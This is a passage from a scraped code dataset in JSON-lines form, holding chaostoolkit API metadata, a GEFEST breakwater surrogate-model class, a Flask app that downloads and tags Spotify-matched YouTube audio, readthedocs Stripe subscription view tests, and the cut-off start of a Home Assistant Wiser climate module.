"line_number": 669, "usage_type": "name"}, {"api_name": "chaoslib.types.Experiment", "line_number": 670, "usage_type": "name"}, {"api_name": "chaoslib.types.Journal", "line_number": 671, "usage_type": "name"}, {"api_name": "chaoslib.types.Configuration", "line_number": 672, "usage_type": "name"}, {"api_name": "chaoslib.types.Secrets", "line_number": 673, "usage_type": "name"}, {"api_name": "chaoslib.types.Dry", "line_number": 675, "usage_type": "name"}, {"api_name": "logzero.logger.info", "line_number": 677, "usage_type": "call"}, {"api_name": "logzero.logger", "line_number": 677, "usage_type": "name"}, {"api_name": "chaoslib.exceptions.InterruptExecution", "line_number": 694, "usage_type": "name"}, {"api_name": "logzero.logger.fatal", "line_number": 700, "usage_type": "call"}, {"api_name": "logzero.logger", "line_number": 700, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 676, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 676, "usage_type": "name"}, {"api_name": "chaoslib.types.Run", "line_number": 676, "usage_type": "name"}, {"api_name": "concurrent.futures.ThreadPoolExecutor", "line_number": 708, "usage_type": "name"}, {"api_name": "chaoslib.types.Experiment", "line_number": 709, "usage_type": "name"}, {"api_name": "chaoslib.types.Journal", "line_number": 710, "usage_type": "name"}, {"api_name": "chaoslib.types.Configuration", "line_number": 711, "usage_type": "name"}, {"api_name": "chaoslib.types.Secrets", "line_number": 712, "usage_type": "name"}, {"api_name": "chaoslib.types.Dry", "line_number": 714, "usage_type": "name"}, {"api_name": "logzero.logger.warning", "line_number": 720, "usage_type": "call"}, {"api_name": "logzero.logger", "line_number": 720, "usage_type": "name"}, {"api_name": "logzero.logger.warning", "line_number": 723, "usage_type": "call"}, {"api_name": "logzero.logger", "line_number": 723, "usage_type": "name"}, {"api_name": "logzero.logger.warning", "line_number": 732, "usage_type": "call"}, {"api_name": "logzero.logger", "line_number": 732, "usage_type": "name"}, {"api_name": "logzero.logger.warning", "line_number": 737, "usage_type": "call"}, {"api_name": "logzero.logger", "line_number": 737, "usage_type": "name"}, {"api_name": "chaoslib.exceptions.InterruptExecution", "line_number": 749, "usage_type": "name"}, {"api_name": "logzero.logger.fatal", "line_number": 751, "usage_type": "call"}, {"api_name": "logzero.logger", "line_number": 751, "usage_type": "name"}, {"api_name": "logzero.logger.warning", "line_number": 754, "usage_type": "call"}, {"api_name": "logzero.logger", "line_number": 754, "usage_type": "name"}, {"api_name": "chaoslib.types.Experiment", "line_number": 763, "usage_type": "name"}, {"api_name": "chaoslib.__version__", "line_number": 765, "usage_type": "name"}, {"api_name": "platform.platform", "line_number": 766, "usage_type": "call"}, {"api_name": "platform.node", "line_number": 767, "usage_type": "call"}, {"api_name": "datetime.datetime.utcnow", "line_number": 769, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 769, "usage_type": "name"}, {"api_name": "chaoslib.types.Journal", "line_number": 763, "usage_type": "name"}, {"api_name": "chaoslib.types.Experiment", "line_number": 778, "usage_type": "name"}, {"api_name": "logzero.logger.debug", "line_number": 793, "usage_type": "call"}, {"api_name": "logzero.logger", "line_number": 793, "usage_type": "name"}, {"api_name": "concurrent.futures.ThreadPoolExecutor", "line_number": 798, "usage_type": "call"}, {"api_name": "logzero.logger.debug", "line_number": 807, "usage_type": "call"}, {"api_name": "logzero.logger", "line_number": 807, "usage_type": "name"}, {"api_name": "concurrent.futures.ThreadPoolExecutor", "line_number": 812, "usage_type": "call"}, {"api_name": "concurrent.futures.ThreadPoolExecutor", "line_number": 778, "usage_type": "name"}, {"api_name": "concurrent.futures.ThreadPoolExecutor", "line_number": 823, "usage_type": "call"}, {"api_name": "concurrent.futures.ThreadPoolExecutor", "line_number": 817, "usage_type": "name"}, {"api_name": "threading.Event", "line_number": 827, "usage_type": "attribute"}, {"api_name": "chaoslib.types.Schedule", "line_number": 828, "usage_type": "name"}, {"api_name": "chaoslib.types.Experiment", "line_number": 829, "usage_type": "name"}, {"api_name": "chaoslib.types.Journal", "line_number": 830, "usage_type": "name"}, {"api_name": "chaoslib.types.Configuration", "line_number": 831, "usage_type": "name"}, {"api_name": "chaoslib.types.Secrets", "line_number": 832, "usage_type": "name"}, {"api_name": "chaoslib.types.Dry", "line_number": 834, "usage_type": "name"}, {"api_name": "logzero.logger.info", "line_number": 840, "usage_type": "call"}, {"api_name": "logzero.logger", "line_number": 840, "usage_type": "name"}, {"api_name": "chaoslib.hypothesis.run_steady_state_hypothesis", "line_number": 853, "usage_type": "call"}, {"api_name": "logzero.logger.warning", "line_number": 863, "usage_type": "call"}, {"api_name": "logzero.logger", "line_number": 863, "usage_type": "name"}, {"api_name": "logzero.logger.info", "line_number": 875, "usage_type": "call"}, {"api_name": "logzero.logger", "line_number": 875, "usage_type": "name"}, {"api_name": "chaoslib.types.Experiment", "line_number": 887, "usage_type": "name"}, {"api_name": "chaoslib.types.Configuration", "line_number": 888, "usage_type": "name"}, {"api_name": "chaoslib.types.Secrets", "line_number": 889, "usage_type": "name"}, {"api_name": "concurrent.futures.ThreadPoolExecutor", "line_number": 890, "usage_type": "name"}, {"api_name": "chaoslib.types.Journal", "line_number": 891, "usage_type": "name"}, {"api_name": "chaoslib.types.Dry", "line_number": 892, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 894, "usage_type": "name"}, {"api_name": "chaoslib.types.Run", "line_number": 894, "usage_type": "name"}, {"api_name": "chaoslib.control.controls", "line_number": 896, "usage_type": "call"}, {"api_name": "chaoslib.activity.run_activities", "line_number": 907, "usage_type": "call"}, {"api_name": "concurrent.futures.Future", "line_number": 916, "usage_type": "argument"}, {"api_name": "logzero.logger.debug", "line_number": 930, "usage_type": "call"}, {"api_name": "logzero.logger", "line_number": 930, "usage_type": "name"}, {"api_name": "logzero.logger.debug", "line_number": 934, "usage_type": "call"}, {"api_name": "logzero.logger", "line_number": 934, "usage_type": "name"}, {"api_name": "concurrent.futures.TimeoutError", "line_number": 943, "usage_type": "name"}, {"api_name": "chaoslib.types.Experiment", "line_number": 950, "usage_type": "name"}, {"api_name": "chaoslib.types.Configuration", "line_number": 951, "usage_type": "name"}, {"api_name": "chaoslib.types.Secrets", "line_number": 952, "usage_type": "name"}, {"api_name": "concurrent.futures.ThreadPoolExecutor", "line_number": 953, "usage_type": "name"}, {"api_name": "chaoslib.types.Dry", "line_number": 954, "usage_type": "name"}, {"api_name": "logzero.logger.info", "line_number": 957, "usage_type": "call"}, {"api_name": "logzero.logger", "line_number": 957, "usage_type": "name"}, {"api_name": "chaoslib.control.controls", "line_number": 958, "usage_type": "call"}, {"api_name": "chaoslib.rollback.run_rollbacks", "line_number": 966, "usage_type": "call"}, {"api_name": "logzero.logger.debug", "line_number": 970, "usage_type": "call"}, {"api_name": "logzero.logger", "line_number": 970, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 956, "usage_type": "name"}, {"api_name": "chaoslib.types.Run", "line_number": 956, "usage_type": "name"}, {"api_name": "chaoslib.types.Experiment", "line_number": 987, "usage_type": "name"}, {"api_name": "concurrent.futures.ThreadPoolExecutor", "line_number": 996, "usage_type": "name"}, {"api_name": "logzero.logger.debug", "line_number": 1009, "usage_type": "call"}, {"api_name": "logzero.logger", "line_number": 1009, "usage_type": "name"}, {"api_name": "logzero.logger.debug", "line_number": 1016, "usage_type": "call"}, {"api_name": "logzero.logger", "line_number": 1016, "usage_type": "name"}, {"api_name": "ctypes.c_long", "line_number": 1023, "usage_type": "call"}, {"api_name": "ctypes.pythonapi.PyGILState_Ensure", "line_number": 1025, "usage_type": "call"}, {"api_name": "ctypes.pythonapi", "line_number": 1025, "usage_type": "attribute"}, {"api_name": "ctypes.pythonapi.PyThreadState_SetAsyncExc", "line_number": 1026, "usage_type": "call"}, {"api_name": "ctypes.pythonapi", "line_number": 1026, "usage_type": "attribute"}, {"api_name": "ctypes.py_object", "line_number": 1027, "usage_type": "call"}, {"api_name": "chaoslib.exceptions.ExperimentExitedException", "line_number": 1027, "usage_type": "argument"}, {"api_name": "ctypes.pythonapi.PyGILState_Release", "line_number": 1030, "usage_type": "call"}, {"api_name": "ctypes.pythonapi", "line_number": 1030, "usage_type": "attribute"}]}
+{"seq_id": "12055273979", "text": "import os\nimport shutil\nfrom typing import Optional\n\nimport matplotlib\nimport matplotlib.pyplot as plt\nimport tensorflow as tf\nfrom tensorflow import keras\n\nfrom gefest.core.structure.domain import Domain\nfrom gefest.core.structure.structure import Structure\n\nmatplotlib.use('agg')\n\n\nclass BWCNN:\n \"\"\"\n ::TODO:: Make abstract version to create own realizations for specific tasks\n \"\"\"\n\n \"\"\"\n Surrogate model for breakwaters task\n \"\"\"\n\n def __init__(self, path, domain: Domain, main_model: Optional = None):\n super(BWCNN, self).__init__()\n\n self.domain = domain\n self.model = keras.models.load_model(path)\n self.main_model = main_model\n\n self._create_temp_path()\n self.img_name = 'tmp_images/0.png'\n self.img_size = 128\n self.rate = 4\n\n def _create_temp_path(self):\n \"\"\"\n Creation of temporary folder for images\n :return: None\n \"\"\"\n path = 'tmp_images'\n\n if os.path.exists(path):\n shutil.rmtree(path)\n os.makedirs(path)\n\n return\n\n def _save_as_fig(self, struct: Structure, ax=plt):\n \"\"\"\n Saving structure as image\n :param struct: (Structure)\n :param ax: figure\n :return: None\n \"\"\"\n plt.style.use('dark_background')\n\n polygons = struct.polygons\n poly_area = self.domain.prohibited_area.polygons\n polygons = polygons + poly_area\n\n for poly in polygons:\n if poly.id == 'tmp':\n line_x = [point.x for point in poly.points]\n line_y = [point.y for point in poly.points]\n ax.plot(line_x, line_y, color='white', linewidth=3)\n elif poly.id == 'prohibited_area':\n line_x = [point.x for point in poly.points]\n line_y = [point.y for point in poly.points]\n ax.fill(line_x, line_y, color='white')\n\n elif poly.id == 'prohibited_poly' or 'prohibited_targets':\n line_x = [point.x for point in poly.points]\n line_y = [point.y for point in poly.points]\n ax.plot(line_x, line_y, color='white', linewidth=1)\n\n ax.axis('off')\n ax.axis(xmin=0, xmax=self.domain.max_x)\n ax.axis(ymin=0, ymax=self.domain.max_y)\n ax.savefig(self.img_name, bbox_inches='tight', pad_inches=0)\n ax.close('all')\n\n def _to_tensor(self, struct: Structure):\n \"\"\"\n Transformation structure to binary tensor\n :param struct: (Structure), input structure\n :return: (Tensor), binary matrix with WxHx1 dimension\n \"\"\"\n self._save_as_fig(struct)\n\n image_tensor = tf.io.read_file(self.img_name)\n image_tensor = tf.image.decode_png(image_tensor, channels=1)\n image_tensor = tf.image.resize(image_tensor, (self.img_size, self.img_size))\n image_tensor = image_tensor / 255\n\n return image_tensor\n\n def estimate(self, struct: Structure):\n \"\"\"\n Estimation step\n :param struct: (Structure), input structure\n :return: (Float), performance of structure\n \"\"\"\n tensor = self._to_tensor(struct)\n tensor = tf.reshape(tensor, (1, self.img_size, self.img_size, 1))\n performance = self.model.predict(tensor)[0][0]\n\n if performance < self.rate:\n _, performance = self.main_model.estimate(struct)\n\n return performance\n", "repo_name": "aimclub/GEFEST", "sub_path": "gefest/tools/estimators/DL/bw_surrogate/bw_cnn.py", "file_name": "bw_cnn.py", "file_ext": "py", "file_size_in_byte": 3433, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 48, "dataset": "github-code", "pt": "53", "api": [{"api_name": "matplotlib.use", "line_number": 13, "usage_type": "call"}, {"api_name": "gefest.core.structure.domain.Domain", "line_number": 25, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 25, "usage_type": "name"}, {"api_name": "tensorflow.keras.models.load_model", "line_number": 29, "usage_type": "call"}, {"api_name": "tensorflow.keras.models", "line_number": 29, "usage_type": "attribute"}, {"api_name": "tensorflow.keras", "line_number": 29, "usage_type": "name"}, {"api_name": "os.path.exists", "line_number": 44, "usage_type": "call"}, {"api_name": "os.path", "line_number": 44, "usage_type": "attribute"}, {"api_name": "shutil.rmtree", "line_number": 45, "usage_type": "call"}, {"api_name": "os.makedirs", "line_number": 46, "usage_type": "call"}, {"api_name": "gefest.core.structure.structure.Structure", "line_number": 50, "usage_type": "name"}, {"api_name": "matplotlib.pyplot", "line_number": 50, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.style.use", "line_number": 57, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.style", "line_number": 57, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 57, "usage_type": "name"}, {"api_name": "gefest.core.structure.structure.Structure", "line_number": 84, "usage_type": "name"}, {"api_name": "tensorflow.io.read_file", "line_number": 92, "usage_type": "call"}, {"api_name": "tensorflow.io", "line_number": 92, "usage_type": "attribute"}, {"api_name": "tensorflow.image.decode_png", "line_number": 93, "usage_type": "call"}, {"api_name": "tensorflow.image", "line_number": 93, "usage_type": "attribute"}, {"api_name": "tensorflow.image.resize", "line_number": 94, "usage_type": "call"}, {"api_name": "tensorflow.image", "line_number": 94, "usage_type": "attribute"}, {"api_name": "gefest.core.structure.structure.Structure", "line_number": 99, "usage_type": "name"}, {"api_name": "tensorflow.reshape", "line_number": 106, "usage_type": "call"}]}
+{"seq_id": "19912457324", "text": "from flask import Flask, request, render_template, send_file\nfrom urllib.request import urlopen\nfrom mutagen.easyid3 import EasyID3, ID3\nfrom mutagen.id3 import APIC as AlbumCover\nfrom mutagen.id3 import USLT\nfrom youtube_search import YoutubeSearch\nfrom pytube import YouTube\nimport base64\nimport requests\nimport json\nimport pyrebase\nfrom telegram import *\nimport moviepy.editor as mp\nfrom os.path import join\nimport os\nimport re\n\nfirebaseConfig = { FIREBASE_CONFIG }\n\ndef generate_code():\n message = \"SPOTIFY_ID:SPOTIFY_SECRET\"\n messageBytes = message.encode('ascii')\n base64Bytes = base64.b64encode(messageBytes)\n return base64Bytes.decode('ascii')\n\ndef get_title(data):\n return data['name']\n\ndef get_album_art(data):\n imageUrl = data['album']['images'][0]['url']\n rawAlbumArt = urlopen(imageUrl).read()\n return rawAlbumArt\n\ndef get_artists(data):\n artists = []\n for item in data['artists']:\n artists.append(item['name'])\n return ', '.join(str(val) for val in artists)\n\ndef get_album_name(data):\n return data['album']['name']\n\ndef get_track_number(data):\n return data['track_number']\n\ndef get_disc_number(data):\n return data['disc_number']\n\ndef get_release_year(data):\n date = data['album']['release_date']\n year = date.split('-')\n return year[0]\n\ndef get_album_artists(data):\n album_artists = []\n for item in data['album']['artists']:\n album_artists.append(item['name'])\n return ', '.join(str(val) for val in album_artists)\n\ntokenUrl = \"https://accounts.spotify.com/api/token\"\nheaders = {}\npayload = {}\n\nheaders['Authorization'] = f\"Basic {generate_code()}\"\npayload['grant_type'] = \"client_credentials\"\n\nr = requests.post(tokenUrl, headers=headers, data=payload)\ntoken = r.json()['access_token']\nheaders = { \"Authorization\": \"Bearer \" + token }\n\nfirebase = pyrebase.initialize_app(firebaseConfig)\ndb = firebase.database()\n\nbot = Bot(BOT_TOKEN)\n\napp = Flask(__name__)\n\n@app.route('/', methods=['GET'])\ndef homepage():\n return render_template('home.html')\n\n@app.route('/download/')\ndef download(trackId):\n test = os.listdir('./')\n for item in test:\n if item.endswith(\".mp3\"):\n os.remove(os.path.join('./', item))\n \n #return trackId\n requestUrl = f\"https://api.spotify.com/v1/tracks/{trackId}\"\n response = requests.get(url=requestUrl, headers=headers)\n data = response.json()\n\n results = YoutubeSearch(f\"{get_artists(data)}+{get_title(data)}+audio+only\", max_results=10).to_dict()\n youtubeSongUrl = 'https://youtube.com/' + str(results[0]['url_suffix'])\n\n convertedFileName = f'{get_album_artists(data)}-{get_title(data)}'\n convertedFilePath = join('.',convertedFileName) + '.mp3'\n\n key = db.child('tracks').child(trackId).get()\n \n try:\n f = bot.getFile(key.val()['file_id'])\n f.download(convertedFilePath)\n return send_file(convertedFilePath, as_attachment = True)\n except:\n yt = YouTube(youtubeSongUrl)\n downloadedFilePath = yt.streams.get_audio_only().download(filename=convertedFileName,skip_existing=False)\n\n clip = mp.AudioFileClip(downloadedFilePath)\n clip.write_audiofile(convertedFilePath)\n\n audioFile = EasyID3(convertedFilePath)\n audioFile.delete()\n\n #Saving track info fetched from Spotify\n audioFile['title'] = get_title(data)\n audioFile['tracknumber'] = str(get_track_number(data))\n audioFile['artist'] = get_artists(data)\n audioFile['album'] = get_album_name(data)\n audioFile['albumartist'] = get_album_artists(data)\n audioFile['originaldate'] = str(get_release_year(data))\n\n audioFile.save(v2_version=3)\n\n #Saving AlbumArt\n audioFile = ID3(convertedFilePath)\n audioFile['APIC'] = AlbumCover(encoding=3,mime='image/jpeg',type=3,desc='Album Art',data=get_album_art(data))\n audioFile.save(v2_version=3)\n\n #remove unwanted YouTube downloads\n os.remove(downloadedFilePath)\n response = bot.send_audio(chat_id='@spotifydldatabase', title = get_title(data), performer = get_artists(data), audio=open(convertedFilePath, 'rb'))\n file_id = response['audio']['file_id']\n db.child('tracks').child(trackId).set({\"file_id\" : file_id})\n return send_file(convertedFilePath, as_attachment = True)\n\n@app.route('/', methods=['POST'])\ndef getQuery():\n rawQuery = request.form['query']\n if 'open.spotify.com' not in rawQuery:\n return render_template('error.html')\n else:\n if '?' in rawQuery:\n trackId = rawQuery.split('/')[4].split('?')[0]\n else:\n trackId = rawQuery.split('/')[4]\n requestUrl = f\"https://api.spotify.com/v1/tracks/{trackId}\"\n response = requests.get(url=requestUrl, headers=headers)\n data = response.json()\n return render_template(\n 'result.html',\n Uri = data['album']['images'][0]['url'],\n title = get_title(data),\n artists = get_artists(data),\n album = get_album_name(data),\n album_artists = get_album_artists(data),\n year = get_release_year(data),\n preview_url = data['preview_url'],\n trackId = trackId\n )\n\nif __name__ == \"__main__\": \n app.run(threaded = True)\n", "repo_name": "Bugadder/flaskApp", "sub_path": "main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 5303, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "base64.b64encode", "line_number": 23, "usage_type": "call"}, {"api_name": "urllib.request.urlopen", "line_number": 31, "usage_type": "call"}, {"api_name": "requests.post", "line_number": 67, "usage_type": "call"}, {"api_name": "pyrebase.initialize_app", "line_number": 71, "usage_type": "call"}, {"api_name": "flask.Flask", "line_number": 76, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 80, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 84, "usage_type": "call"}, {"api_name": "os.remove", "line_number": 87, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 87, "usage_type": "call"}, {"api_name": "os.path", "line_number": 87, "usage_type": "attribute"}, {"api_name": "requests.get", "line_number": 91, "usage_type": "call"}, {"api_name": "youtube_search.YoutubeSearch", "line_number": 94, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 98, "usage_type": "call"}, {"api_name": "flask.send_file", "line_number": 105, "usage_type": "call"}, {"api_name": "pytube.YouTube", "line_number": 107, "usage_type": "call"}, {"api_name": "moviepy.editor.AudioFileClip", "line_number": 110, "usage_type": "call"}, {"api_name": "moviepy.editor", "line_number": 110, "usage_type": "name"}, {"api_name": "mutagen.easyid3.EasyID3", "line_number": 113, "usage_type": "call"}, {"api_name": "mutagen.easyid3.ID3", "line_number": 127, "usage_type": "call"}, {"api_name": "mutagen.id3.APIC", "line_number": 128, "usage_type": "call"}, {"api_name": "os.remove", "line_number": 132, "usage_type": "call"}, {"api_name": "flask.send_file", "line_number": 136, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 140, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 140, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 142, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 149, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 151, "usage_type": "call"}]}
+{"seq_id": "26276930133", "text": "from unittest import mock\n\nimport requests_mock\nimport stripe\nfrom django.conf import settings\nfrom django.contrib.auth.models import User\nfrom django.test import TestCase, override_settings\nfrom django.urls import reverse\nfrom django_dynamic_fixture import get\n\nfrom readthedocs.organizations.models import Organization\nfrom readthedocs.subscriptions.models import Plan, Subscription\n\n\n@override_settings(RTD_ALLOW_ORGANIZATIONS=True)\nclass SubscriptionViewTests(TestCase):\n\n \"\"\"Subscription view tests.\"\"\"\n\n def setUp(self):\n self.user = get(User)\n self.organization = get(Organization, stripe_id='123', owners=[self.user])\n self.plan = get(Plan, published=True, slug=settings.ORG_DEFAULT_SUBSCRIPTION_PLAN_SLUG)\n self.subscription = get(\n Subscription,\n organization=self.organization,\n plan=self.plan,\n status='active',\n )\n self.client.force_login(self.user)\n\n def test_active_subscription(self):\n resp = self.client.get(reverse('subscription_detail', args=[self.organization.slug]))\n self.assertEqual(resp.status_code, 200)\n self.assertEqual(resp.context['subscription'], self.subscription)\n self.assertContains(resp, 'active')\n # The subscribe form isn't shown, but the manage susbcription button is.\n self.assertContains(resp, 'Manage Subscription')\n self.assertNotContains(resp, 'Create Subscription')\n\n @requests_mock.Mocker(kw='mock_request')\n def test_manage_subscription(self, mock_request):\n payload = {\n 'url': 'https://billing.stripe.com/session/a1b2c3',\n }\n mock_request.post('https://api.stripe.com/v1/billing_portal/sessions', json=payload)\n response = self.client.post(\n reverse(\n 'stripe_customer_portal',\n kwargs={'slug': self.organization.slug},\n ),\n )\n self.assertRedirects(\n response,\n payload.get('url'),\n fetch_redirect_response=False,\n )\n\n @mock.patch(\"readthedocs.subscriptions.managers.stripe.Subscription.create\")\n @mock.patch(\"readthedocs.subscriptions.utils.stripe.Customer.retrieve\")\n @mock.patch(\"readthedocs.subscriptions.utils.stripe.Customer.create\")\n def test_user_without_subscription(\n self, customer_create_mock, customer_retrieve_mock, subscription_create_mock\n ):\n subscription_create_mock.return_value = stripe.Subscription.construct_from(\n values={\n \"id\": \"sub_a1b2c3\",\n \"start_date\": 1610532715.085267,\n \"current_period_end\": 1610532715.085267,\n \"trial_end\": 1610532715.085267,\n \"status\": \"active\",\n },\n key=None,\n )\n customer_retrieve_mock.return_value = stripe.Customer.construct_from(\n values={\"id\": \"cus_a1b2c3\"},\n key=None,\n )\n self.subscription.delete()\n self.organization.refresh_from_db()\n self.assertFalse(hasattr(self.organization, 'subscription'))\n resp = self.client.get(reverse('subscription_detail', args=[self.organization.slug]))\n self.assertEqual(resp.status_code, 200)\n self.organization.refresh_from_db()\n subscription = self.organization.subscription\n self.assertEqual(subscription.status, 'active')\n self.assertEqual(subscription.stripe_id, 'sub_a1b2c3')\n customer_retrieve_mock.assert_called_once()\n customer_create_mock.assert_not_called()\n\n @mock.patch(\"readthedocs.subscriptions.managers.stripe.Subscription.create\")\n @mock.patch(\"readthedocs.subscriptions.utils.stripe.Customer.retrieve\")\n @mock.patch(\"readthedocs.subscriptions.utils.stripe.Customer.create\")\n def test_user_without_subscription_and_customer(\n self, customer_create_mock, customer_retrieve_mock, subscription_create_mock\n ):\n subscription_create_mock.return_value = stripe.Subscription.construct_from(\n values={\n \"id\": \"sub_a1b2c3\",\n \"start_date\": 1610532715.085267,\n \"current_period_end\": 1610532715.085267,\n \"trial_end\": 1610532715.085267,\n \"status\": \"active\",\n },\n key=None,\n )\n customer_create_mock.return_value = stripe.Customer.construct_from(\n values={\"id\": \"cus_a1b2c3\"},\n key=None,\n )\n # When stripe_id is None, a new customer is created.\n self.organization.stripe_id = None\n self.organization.save()\n self.subscription.delete()\n self.organization.refresh_from_db()\n self.assertFalse(hasattr(self.organization, 'subscription'))\n self.assertIsNone(self.organization.stripe_id)\n customer_retrieve_mock.reset_mock()\n resp = self.client.get(reverse('subscription_detail', args=[self.organization.slug]))\n self.assertEqual(resp.status_code, 200)\n self.organization.refresh_from_db()\n subscription = self.organization.subscription\n self.assertEqual(subscription.status, 'active')\n self.assertEqual(subscription.stripe_id, 'sub_a1b2c3')\n self.assertEqual(self.organization.stripe_id, 'cus_a1b2c3')\n customer_create_mock.assert_called_once()\n # Called from a signal of .save()\n customer_retrieve_mock.assert_called_once()\n\n def test_user_with_canceled_subscription(self):\n self.subscription.status = 'canceled'\n self.subscription.save()\n resp = self.client.get(reverse('subscription_detail', args=[self.organization.slug]))\n self.assertEqual(resp.status_code, 200)\n self.assertEqual(resp.context['subscription'], self.subscription)\n # The Manage Subscription form isn't shown, but the Subscribe is.\n self.assertNotContains(resp, 'Manage Subscription')\n self.assertContains(resp, 'Create Subscription')\n", "repo_name": "yahor22337/yahor-readthedocs", "sub_path": "readthedocs/subscriptions/tests/test_views.py", "file_name": "test_views.py", "file_ext": "py", "file_size_in_byte": 5959, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "django.test.TestCase", "line_number": 16, "usage_type": "name"}, {"api_name": "django_dynamic_fixture.get", "line_number": 21, "usage_type": "call"}, {"api_name": "django.contrib.auth.models.User", "line_number": 21, "usage_type": "argument"}, {"api_name": "django_dynamic_fixture.get", "line_number": 22, "usage_type": "call"}, {"api_name": "readthedocs.organizations.models.Organization", "line_number": 22, "usage_type": "argument"}, {"api_name": "django_dynamic_fixture.get", "line_number": 23, "usage_type": "call"}, {"api_name": "readthedocs.subscriptions.models.Plan", "line_number": 23, "usage_type": "argument"}, {"api_name": "django.conf.settings.ORG_DEFAULT_SUBSCRIPTION_PLAN_SLUG", "line_number": 23, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 23, "usage_type": "name"}, {"api_name": "django_dynamic_fixture.get", "line_number": 24, "usage_type": "call"}, {"api_name": "readthedocs.subscriptions.models.Subscription", "line_number": 25, "usage_type": "argument"}, {"api_name": "django.urls.reverse", "line_number": 33, "usage_type": "call"}, {"api_name": "django.urls.reverse", "line_number": 48, "usage_type": "call"}, {"api_name": "requests_mock.Mocker", "line_number": 41, "usage_type": "call"}, {"api_name": "stripe.Subscription.construct_from", "line_number": 65, "usage_type": "call"}, {"api_name": "stripe.Subscription", "line_number": 65, "usage_type": "attribute"}, {"api_name": "stripe.Customer.construct_from", "line_number": 75, "usage_type": "call"}, {"api_name": "stripe.Customer", "line_number": 75, "usage_type": "attribute"}, {"api_name": "django.urls.reverse", "line_number": 82, "usage_type": "call"}, {"api_name": "unittest.mock.patch", "line_number": 59, "usage_type": "call"}, {"api_name": "unittest.mock", "line_number": 59, "usage_type": "name"}, {"api_name": "unittest.mock.patch", "line_number": 60, "usage_type": "call"}, {"api_name": "unittest.mock", "line_number": 60, "usage_type": "name"}, {"api_name": "unittest.mock.patch", "line_number": 61, "usage_type": "call"}, {"api_name": "unittest.mock", "line_number": 61, "usage_type": "name"}, {"api_name": "stripe.Subscription.construct_from", "line_number": 97, "usage_type": "call"}, {"api_name": "stripe.Subscription", "line_number": 97, "usage_type": "attribute"}, {"api_name": "stripe.Customer.construct_from", "line_number": 107, "usage_type": "call"}, {"api_name": "stripe.Customer", "line_number": 107, "usage_type": "attribute"}, {"api_name": "django.urls.reverse", "line_number": 119, "usage_type": "call"}, {"api_name": "unittest.mock.patch", "line_number": 91, "usage_type": "call"}, {"api_name": "unittest.mock", "line_number": 91, "usage_type": "name"}, {"api_name": "unittest.mock.patch", "line_number": 92, "usage_type": "call"}, {"api_name": "unittest.mock", "line_number": 92, "usage_type": "name"}, {"api_name": "unittest.mock.patch", "line_number": 93, "usage_type": "call"}, {"api_name": "unittest.mock", "line_number": 93, "usage_type": "name"}, {"api_name": "django.urls.reverse", "line_number": 133, "usage_type": "call"}, {"api_name": "django.test.override_settings", "line_number": 15, "usage_type": "call"}]}
+{"seq_id": "17150029031", "text": "\"\"\"\nClimate Platform Device for Wiser Rooms.\n\nhttps://github.com/asantaga/wiserHomeAssistantPlatform\nAngelosantagata@gmail.com\n\n\"\"\"\nfrom functools import partial\n\nimport voluptuous as vol\n\nfrom homeassistant.components.climate.const import (\n CURRENT_HVAC_HEAT,\n CURRENT_HVAC_IDLE,\n HVAC_MODE_AUTO,\n HVAC_MODE_HEAT,\n HVAC_MODE_OFF,\n SUPPORT_PRESET_MODE,\n SUPPORT_TARGET_TEMPERATURE,\n)\nfrom homeassistant.const import ATTR_ENTITY_ID, ATTR_TEMPERATURE, TEMP_CELSIUS\nfrom homeassistant.core import callback\nimport homeassistant.helpers.config_validation as cv\nfrom homeassistant.helpers.dispatcher import async_dispatcher_connect\nfrom homeassistant.util import dt\n\nfrom .const import (\n _LOGGER,\n CONF_BOOST_TEMP,\n CONF_BOOST_TEMP_TIME,\n DATA,\n DOMAIN,\n MANUFACTURER,\n ROOM,\n WISER_SERVICES,\n)\n\ntry:\n from homeassistant.components.climate import ClimateEntity\nexcept ImportError:\n from homeassistant.components.climate import ClimateDevice as ClimateEntity\n\n\nATTR_TIME_PERIOD = \"time_period\"\nATTR_TEMPERATURE_DELTA = \"temperature_delta\"\n\nPRESET_AWAY = \"Away Mode\"\nPRESET_AWAY_BOOST = \"Away Boost\"\nPRESET_AWAY_OVERRIDE = \"Away Override\"\nPRESET_BOOST = \"boost\"\nPRESET_BOOST30 = \"Boost 30m\"\nPRESET_BOOST60 = \"Boost 1h\"\nPRESET_BOOST120 = \"Boost 2h\"\nPRESET_BOOST180 = \"Boost 3h\"\nPRESET_BOOST_CANCEL = \"Cancel Boost\"\nPRESET_OVERRIDE = \"Override\"\n\nWISER_PRESET_TO_HASS = {\n \"fromawaymode\": PRESET_AWAY,\n \"frommanualmode\": None,\n \"fromboost\": PRESET_BOOST,\n \"frommanualoverrideduringaway\": PRESET_AWAY_OVERRIDE,\n \"fromboostduringaway\": PRESET_AWAY_BOOST,\n \"frommanualoverride\": PRESET_OVERRIDE,\n \"fromecoiq\": None,\n \"fromschedule\": None,\n \"fromcomfortmode\": None,\n}\n\nHASS_HVAC_TO_WISER = {\n HVAC_MODE_AUTO: \"auto\",\n HVAC_MODE_HEAT: \"manual\",\n HVAC_MODE_OFF: \"manual\",\n}\n\nSUPPORT_FLAGS = SUPPORT_TARGET_TEMPERATURE | 